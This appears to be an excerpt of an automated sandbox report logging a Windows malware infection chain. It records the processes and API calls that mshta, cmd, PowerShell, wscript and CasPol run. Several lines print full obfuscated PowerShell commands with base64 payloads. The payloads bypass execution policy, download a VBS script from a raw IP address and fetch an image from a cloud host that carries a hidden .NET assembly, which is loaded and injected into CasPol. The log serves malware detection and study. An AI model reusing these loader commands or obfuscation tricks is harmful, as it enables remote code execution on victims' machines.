Code function: 11_2_00418764 mouse_event,

11_2_00418764

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00433E1A cpuid

11_2_00433E1A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	11_2_004510CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	11_2_004470BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_004511F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	11_2_004512FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_004513C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	11_2_004475A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoA,	11_2_0040E679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_00450A8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	11_2_00450D52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	11_2_00450D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	11_2_00450DED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_00450E7A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
